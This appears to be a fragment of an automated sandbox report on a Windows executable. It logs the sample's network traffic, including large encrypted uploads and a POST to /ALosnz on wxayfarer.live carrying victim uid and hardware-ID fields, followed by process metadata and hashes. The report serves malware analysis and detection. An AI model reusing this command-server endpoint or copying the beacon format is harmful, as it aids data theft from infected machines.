                                                            2025-03-25 07:16:48 UTC15331OUTData Raw: e6 aa ac 6a 63 0e e5 c7 83 98 10 4f 0d 7f 1c 63 61 91 d3 8e 0d 82 53 65 a3 71 19 9b 58 fd 29 e5 f5 61 51 31 14 31 5e 2d 79 cc dc 7f 3e 41 3e 7f 06 85 30 fa 25 52 f9 57 b5 0d fe e3 6e 32 aa 0c ca 3b 90 60 f5 80 5d fd 75 7e de 64 d0 f0 8a 87 cd 36 f9 e6 6e b7 7d ff de be 1d a3 ea f5 61 5a 4a 53 fc ea 18 6a 6a cb 60 62 9e 0a 29 74 fe 5e bc 6e f4 69 8f f7 26 1d 9e 64 f6 1c c0 28 f9 8e 7b cc 8b 89 dd f1 ea 24 9c 0b 63 51 74 47 2b 79 1b 8d ee c2 e7 f3 4b 6d 6f 72 db 30 83 da ba 74 4c 65 1f db b4 71 55 ef e2 e8 aa 81 7b a5 91 f1 85 6c 86 33 ca 19 f5 ab b6 0b 2b fb 8f ea 55 9b cc 62 5c 9c 79 40 c6 03 06 f8 08 23 fd a3 21 c8 02 40 f9 71 43 99 df 3c 38 5f 17 32 1b 99 b2 2c 21 da 26 73 cb 25 03 fd 6d 76 2c e3 2c 2b b9 24 e7 57 73 17 fc 87 6c 62 cc d1 e6 8c 90 53 fb
                                                            Data Ascii: jcOcaSeqX)aQ11^-y>A>0%RWn2;`]u~d6n}aZJSjj`b)t^ni&d({$cQtG+yKmor0tLeqU{l3+Ub\y@#!@qC<8_2,!&s%mv,,+$WslbS
                                                            2025-03-25 07:16:48 UTC15331OUTData Raw: e0 7e ac 0c ce cf e8 4d c8 12 c5 ec c1 36 9d fe 11 ba 30 4f cb a3 ce 8c 8e be 03 6e 39 fe 95 d4 8d 20 0c dc 7c c3 13 0e e7 a1 9f 48 1b d3 f6 60 3f 27 47 1c 7a d8 73 43 8f d5 8b 23 d6 f0 1f 2d 93 b4 d1 63 02 b4 c8 51 3c c0 30 e7 4a 21 27 a3 5a 34 6a e8 39 90 3d 84 7e b6 04 1f 33 d4 de e3 20 39 3b 3b b1 05 80 b9 fb be 24 d3 b6 05 e4 75 02 74 88 ba 1a 31 4b 2b 30 f3 6a f5 1f 66 8f 60 41 d4 3b 97 d1 75 2d 5c c3 dc e7 f9 24 4c 2c af e9 26 d6 00 a2 54 bd c1 a0 ec dc 0f 52 2b 2f 1a 93 0e 37 89 e1 a1 df a4 27 ef 6b 76 02 55 88 af 6e db 29 c8 de ac 07 60 3b e3 54 68 81 fe a2 a8 61 74 41 fd 08 2f 51 90 01 71 6b cd 03 6b 93 dd 48 98 aa 9e 52 2e ab db 15 7c 51 75 03 dd 5f 3c 95 04 2b 2b f6 94 81 94 1c 1f ba 06 e2 2b 9b 8d 77 69 2e 9e 99 cd 15 b8 fa 0d 1d e2 18 23 94
                                                            Data Ascii: ~M60On9 |H`?'GzsC#-cQ<0J!'Z4j9=~3 9;;$ut1K+0jf`A;u-\$L,&TR+/7'kvUn)`;ThatA/QqkkHR.|Qu_<+++wi.#
                                                            2025-03-25 07:16:48 UTC15331OUTData Raw: bf 23 9c 8c 42 df 4b 1a 5b 4f 03 94 7c 0e af f7 ef 61 05 44 2f 40 3a c6 92 4f 19 40 bb de 85 2b 84 18 02 d6 83 01 7e 96 87 51 23 62 8c da d1 ca fe da f6 ce 3e 9f ba 94 87 ff 59 56 c3 e7 4b 5a 09 29 0d 86 a9 92 fa 1b ce 26 2f 18 57 20 23 95 cb 86 f0 ca 74 e3 b3 7a ca b2 ec e7 20 c8 6a 40 d3 0f 9d d4 71 ad 5f ed 4a fd 81 5a b6 d5 42 56 a1 f5 f9 ef fe 6a 95 ca e4 18 28 f2 af bd f7 f4 1b 73 7e f3 7b 89 b8 5c 6a 28 5b 00 e5 59 73 0c 16 0e 64 ae 2b 15 64 34 12 91 cb e2 9b 83 e2 94 d7 55 5d ef e0 11 de 1d fc 37 05 9f 58 62 da bc 9d 13 37 09 4b b3 ec 83 c5 b4 a1 bc e8 c2 0c 85 3f 7a e6 4c c7 1e 64 9e 63 45 ec 54 2a 21 4b a9 ab ea cc c6 bf a1 f3 3a e5 61 4b c7 8f 6a 6b f8 d0 a9 e7 ba 28 00 2f e8 06 a3 8f 2b 9a 00 85 91 67 a6 f4 68 8f 90 93 90 05 0c ce 22 f3 37 9a
                                                            Data Ascii: #BK[O|aD/@:O@+~Q#b>YVKZ)&/W #tz j@q_JZBVj(s~{\j([Ysd+d4U]7Xb7K?zLdcET*!K:aKjk(/+gh"7
                                                            2025-03-25 07:16:48 UTC15331OUTData Raw: bf 74 7c db bf 4a f4 e4 bf 66 18 b5 a4 8e 9c 58 d2 68 37 2d 77 40 40 03 1a 51 ff 73 15 ad 27 fb 91 ca 56 fc 12 65 a6 15 70 a1 60 96 29 3e b6 59 97 31 7e e9 d0 0d 2c d9 95 6c a5 be e3 c7 5a 8a 11 54 a2 f3 a1 27 c8 cf 27 6d f8 71 cb fc 38 34 e0 42 52 c1 ea 31 41 1f b1 00 cd e3 51 ec cf 9d 59 ad 3a da 8e 0f 1e 4c 18 3f 28 7f d4 0e f0 98 e4 d5 a7 9b 1d 8d 32 b6 99 6e 5b 19 b5 35 48 e4 18 1e 34 33 47 a3 c7 77 11 59 70 2a 41 6b d8 b2 d5 de 5f 65 c1 48 86 b4 26 68 ec 36 d8 1c 1c 96 2e ab bf 68 93 2e a4 07 56 3b f8 ee f4 b1 c1 26 d5 2a 1b 80 18 39 a2 12 01 bb 23 f5 07 1f e1 c5 fc e5 72 14 dc ba 16 e2 9e 98 99 ef 48 6f b5 4a 54 b1 f4 4b a6 08 5a eb af f7 8d 49 25 0f 5c 6a a8 e7 3f a0 5e 08 53 3e a1 9a ce c2 7f 26 3a 25 b6 d6 92 99 e1 e9 ea 00 d2 90 ee 0d 88 2b cd
                                                            Data Ascii: t|JfXh7-w@@Qs'Vep`)>Y1~,lZT''mq84BR1AQY:L?(2n[5H43GwYp*Ak_eH&h6.h.V;&*9#rHoJTKZI%\j?^S>&:%+
                                                            2025-03-25 07:16:48 UTC15331OUTData Raw: 80 b3 bf c3 cd 91 f6 cd d2 7b 04 7d e0 d0 4a 6e 72 e7 cb 20 79 3a 4e df 03 52 c5 94 6f 8d 56 5b 34 67 96 af d3 15 d0 2d ea b2 ce 36 26 a1 fc 98 d8 1b 17 01 b6 d7 85 f1 8e e1 83 c7 11 92 14 b4 15 fc e6 d1 d4 ba 9c fa c5 b1 1e 89 64 73 b1 eb 5e d0 09 7b 01 25 b7 0d cc 92 93 7b 9c 50 ce 55 89 be ec 40 50 66 17 bb 9f 42 a5 1c 4e 35 b6 b1 d7 4d 9a ea d4 c9 ee da 38 7c 17 aa 74 30 dd ae c4 b6 66 d0 1d 2c a7 58 d5 f8 ed cb 34 46 ac 9a 51 b6 76 f1 09 e5 8e b9 aa 2c 4e 41 b0 c3 49 2e 13 83 61 d6 f5 96 75 2d f8 77 43 d5 fd 0b ec b6 5f e5 59 47 0a e4 e0 3a fb 8b ee 98 d9 8b b2 a8 ed 3d ba b8 12 cb 3c fe 4a f5 bc 98 2d 4f da 9c 0e f7 e7 3c cb 12 57 f6 e6 fa 3e 6e 0f 28 e8 98 a8 67 3a 1a e3 c5 3e 8e 04 77 4d ed ac 8c e6 76 39 94 a1 0b 93 5c 27 79 71 27 2b 9a 33 1b b9
                                                            Data Ascii: {}Jnr y:NRoV[4g-6&ds^{%{PU@PfBN5M8|t0f,X4FQv,NAI.au-wC_YG:=<J-O<W>n(g:>wMv9\'yq'+3
                                                            2025-03-25 07:16:48 UTC15331OUTData Raw: 8b 8e 6a fb 02 c1 cd 33 41 06 1b de 65 7f db 08 a0 9d 47 2b ed a9 ad 75 37 cb ec 41 45 7c 9a ab f5 0a 9a fa 78 ef 88 7f 70 a4 60 cb 08 fb 85 ca 75 ee 10 fc 28 30 f2 72 24 97 79 0f e8 dd d9 8a ce 2b 7b 82 b6 13 5d aa e4 94 82 f9 19 c6 fc 7b 35 7d d0 35 60 04 08 c8 63 b0 07 8e 7e 6c 92 a4 56 a0 43 74 59 d7 46 ce cf 6b 96 38 0d 84 9b dd 48 72 47 8e 1a 32 cd 93 1a 49 22 33 33 18 1d 8a 9a 3e 97 c5 3a 5b 54 a7 22 21 03 fe 8c dc c1 dc e1 fb 3a f3 13 25 bf c6 ff 7a ea 9f 0e e1 98 ee 62 46 90 b9 d9 c5 04 33 a2 c8 86 01 3a 75 28 b5 57 84 9f ee 7b 80 77 83 60 9a 5a 4d cd 97 3a 2d ca a2 29 e6 05 2f 27 b4 94 81 44 bf 95 a8 da 70 fe 12 e9 93 9a c5 57 61 b5 f7 b6 e2 9b e2 8b 54 53 35 fe 16 80 b8 ec 76 85 93 08 90 cd 99 71 7a 57 98 3c 89 75 e5 c6 7a 16 ab ef 2e 29 88 17
                                                            Data Ascii: j3AeG+u7AE|xp`u(0r$y+{]{5}5`c~lVCtYFk8HrG2I"33>:[T"!:%zbF3:u(W{w`ZM:-)/'DpWaTS5vqzW<uz.)
                                                            2025-03-25 07:16:48 UTC15331OUTData Raw: 96 72 44 0f c2 84 dd da 32 8c e7 3e 3e 81 91 4f 06 54 d1 2b 5f 4e 4b 6f 06 23 1b 7e ec a9 07 60 58 e0 bf b1 00 28 09 2f c6 11 a7 52 6b 3e 6e 92 99 52 a1 95 01 21 3d 83 13 e1 01 51 e6 e1 a3 e6 63 b0 69 0e 01 b0 78 4f 00 8c 6b 3f 47 0d cf 7d 90 e8 67 a3 45 dd 4f e9 a1 bd 56 6f 5e 24 76 bf fd b8 ac 85 68 31 f5 42 f6 29 b3 af 54 31 3b 5c db 7c e9 38 a9 d6 3b ef 6e 5d 5b 97 0c f3 f0 0f 90 53 29 99 2d 38 73 b1 4f 3b ef 20 87 b2 68 09 69 ee e5 93 80 b0 a1 29 56 b3 08 23 ac 84 8f bd 3f 94 bf 21 0f 79 93 2f ad 2e fe 75 b2 0e 98 c2 10 53 3d cf b4 9b d7 c7 48 af a7 db c2 44 06 cb 19 e5 ee a5 37 84 27 02 ef 0c e6 a2 15 ad 3e a9 95 e3 c8 73 49 bf 1a 48 6c e6 3c 3a 46 f3 55 a7 7a 35 6c 8c 82 48 03 11 55 4f 3f f6 af 55 ed 0f 5a 71 9a d8 73 b0 ae bd 39 61 01 73 23 66 70
                                                            Data Ascii: rD2>>OT+_NKo#~`X(/Rk>nR!=QcixOk?G}gEOVo^$vh1B)T1;\|8;n][S)-8sO; hi)V#?!y/.uS=HD7'>sIHl<:FUz5lHUO?UZqs9as#fp
                                                            2025-03-25 07:16:48 UTC15331OUTData Raw: 73 68 73 f6 30 85 a0 bd 76 e5 a9 03 fa 3c f3 19 6b b6 49 a5 95 de a9 a3 25 1e e7 87 5f 10 79 94 21 01 ad 33 07 df a9 e0 b0 27 22 7c 6e 46 68 22 29 f0 34 1e 49 3e 8d b9 eb 15 03 ac 85 23 b3 96 8f be 0d 54 98 ef 23 97 0a 97 02 15 ca f7 8e b2 c9 1b f5 32 05 47 c6 7b b8 a0 0d 5a 67 bb 05 2b c5 4b 86 2f f1 44 1e 75 27 ca c3 01 de bf d8 91 b6 ef e9 90 7b 9a 0c 53 32 14 8c 64 90 5b 44 45 c8 c8 51 18 22 a3 d1 af 92 c3 ee 44 49 f7 96 b6 bb 49 b6 72 0d 59 75 b1 6d 52 2f 55 23 66 07 4b 5e e8 99 64 76 8d f7 88 4a 24 45 07 19 9a 16 42 8d 28 5f ff 30 e6 29 eb 81 69 9e be 91 42 e7 38 ba 37 92 d6 8f 74 36 28 c0 4a 19 65 34 36 61 b9 84 8b 21 ef a9 41 09 78 7a cb fa dd 8e 60 a4 3f 1f e9 57 cb 7b 96 c8 6b 50 cc 8a 55 d9 45 96 87 01 cc 90 a9 1c a6 04 37 3f 31 22 12 47 84 b8
                                                            Data Ascii: shs0v<kI%_y!3'"|nFh")4I>#T#2G{Zg+K/Du'{S2d[DEQ"DIIrYumR/U#fK^dvJ$EB(_0)iB87t6(Je46a!Axz`?W{kPUE7?1"G
                                                            2025-03-25 07:16:49 UTC816INHTTP/1.1 200 OK
                                                            Date: Tue, 25 Mar 2025 07:16:49 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PsxOQTT0tzT7pRuyf5115o2qi0rvquSGfWeSJSoft%2BJ9epBk9%2F0Igygyk3f3uQD3ZEAGSg%2FKplupJcCP4WMjfNMcXMPdw1T3QwIVOsGILnPyi0TYBr%2F14c4JNqBVuygdPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 925c9ff939d39d36-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=96935&min_rtt=96901&rtt_var=20498&sent=296&recv=454&lost=0&retrans=0&sent_bytes=2833&recv_bytes=554560&delivery_rate=38395&cwnd=251&unsent_bytes=0&cid=b6862b80287c7cee&ts=1304&x=0"


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.749687104.21.112.14436940C:\Users\user\Desktop\Qyk8RJnGN7.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-03-25 07:16:49 UTC265OUTPOST /ALosnz HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                            Content-Length: 89
                                                            Host: wxayfarer.live
                                                            2025-03-25 07:16:49 UTC89OUTData Raw: 75 69 64 3d 64 62 39 38 62 62 34 33 30 31 36 30 66 62 33 36 36 64 61 36 31 64 63 37 34 34 35 35 38 39 31 37 38 62 36 63 34 61 63 38 36 64 26 63 69 64 3d 26 68 77 69 64 3d 32 32 37 32 30 46 34 37 37 33 44 44 32 46 38 44 33 38 30 31 35 45 33 30 45 35 45 34 35 38 39 39
                                                            Data Ascii: uid=db98bb430160fb366da61dc7445589178b6c4ac86d&cid=&hwid=22720F4773DD2F8D38015E30E5E45899
                                                            2025-03-25 07:16:50 UTC780INHTTP/1.1 200 OK
                                                            Date: Tue, 25 Mar 2025 07:16:50 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 104
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h2CTxFgo4B0eQAdBaJL%2B5TSjV2ySGDw6N2tUjBbiU3PJacaE40LLTAFssg8Do1fi0oIGj4nNdggyKTq2VqM2hB6hCiKwAJqgsZSLWmSddx8Ab4wbPZv3fWQ0fJyNAt2ptA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 925ca0039bf923ce-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=96405&min_rtt=96276&rtt_var=20504&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=990&delivery_rate=38540&cwnd=251&unsent_bytes=0&cid=4a925a33f0acdf40&ts=552&x=0"
                                                            2025-03-25 07:16:50 UTC104INData Raw: 99 30 1e 47 ff 62 9e 29 a6 a0 ec 42 2b 0a 76 e3 4d 47 b4 6b 12 42 97 71 71 a8 c9 00 be 4a d2 fe d0 5a 25 c6 bd a6 b7 4f ef b9 1f 9e 5c 81 bf 17 fc d8 b0 07 06 e1 1d 92 44 e9 9c 56 f7 17 6c 2b 46 d0 0e a2 d7 c3 c3 bd 0e 88 db 17 ae 3c db 32 d1 12 4f 12 1e 29 6c 59 b8 fa a3 02 1a 0d 24 bc 84 43 e3 10 03 32 98 24
                                                            Data Ascii: 0Gb)B+vMGkBqqJZ%O\DVl+F<2O)lY$C2$


                                                            050100s020406080100

                                                            Click to jump to process

                                                            050100s0.005101520MB

                                                            Click to jump to process

                                                            • File
                                                            • Registry

                                                            Click to dive into process behavior distribution

                                                            Target ID:0
                                                            Start time:03:16:38
                                                            Start date:25/03/2025
                                                            Path:C:\Users\user\Desktop\Qyk8RJnGN7.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Qyk8RJnGN7.exe"
                                                            Imagebase:0xc90000
                                                            File size:2'930'176 bytes
                                                            MD5 hash:880AF66F46621859F8330E966419E8CF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true
                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                            Non-executed Functions

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000003.999657128.0000000001516000.00000004.00000020.00020000.00000000.sdmp, Offset: 01516000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_3_1516000_Qyk8RJnGN7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: '$Wind
                                                            • API String ID: 0-1062680885
                                                            • Opcode ID: 9ebf6f0c0a551cd1b440c4f63216fb442879d27352d4ddcd8fa7c88b5cbeec8b
                                                            • Instruction ID: f4453cf72ed668f71b8ff50400e907e4e8963552481702bd2d58449a02e7a21b
                                                            • Opcode Fuzzy Hash: 9ebf6f0c0a551cd1b440c4f63216fb442879d27352d4ddcd8fa7c88b5cbeec8b
                                                            • Instruction Fuzzy Hash: 88320F6144E7C25FE3138B748C696957FB1AF13228B1E46DBC4D08F4E7E29D894AC362
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000003.984015002.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, Offset: 014A7000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_3_14a7000_Qyk8RJnGN7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dcb358ed5c7070a5400725e4309323cdc77960945dfb58641ae921c6d71f22c5
                                                            • Instruction ID: c3020337311cb59ee07640ea8ebce41f5ce69b60cc67cae18488984bfab5586f
                                                            • Opcode Fuzzy Hash: dcb358ed5c7070a5400725e4309323cdc77960945dfb58641ae921c6d71f22c5
                                                            • Instruction Fuzzy Hash: DFB170310097D29FC7678F7884A56A37FF1EF07324B2909E9E0C18D463E26A1953CB62